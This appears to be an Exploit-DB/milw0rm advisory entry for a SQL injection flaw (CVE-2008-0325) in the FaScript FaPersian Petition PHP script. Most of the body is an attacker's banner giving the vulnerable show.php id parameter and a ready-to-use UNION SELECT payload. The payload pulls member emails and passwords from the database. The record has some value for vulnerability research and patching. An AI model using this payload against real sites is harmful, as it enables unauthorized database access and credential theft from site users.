FaScript FaPersian Petition show.php SQL Injection Vulnerability

2008-01-15T00:00:00
ID EDB-ID:4916
Type exploitdb
Reporter Khashayar Fereidani
Modified 2008-01-15T00:00:00

Description

FaScript FaPersian Petition (show.php) SQL Injection Vulnerability. CVE-2008-0325. Webapps exploit for php platform

                                        
                                            #####################################################################################
####           FaScript FaPersian Petition Remote Sql Injection                  ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#Script Download : http://fascript.com/fapersianpetition.zip                        #
#                                                                                   #
#Injection Adress :  http://Sitename/fp/show.php?id=<SqL Code>                      #
#                                                                                   #
#                                                                                   #
#SQL For find Username and password : 999999'%20union/**/select/**/0,1,2,3,4,5,6,concat(0x3c62723e200d0a4c6f67696e3a,email,0x3c62723e200d0a50617373776f72643a,password),8,9,10,11/**/from/**/member/*
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-15]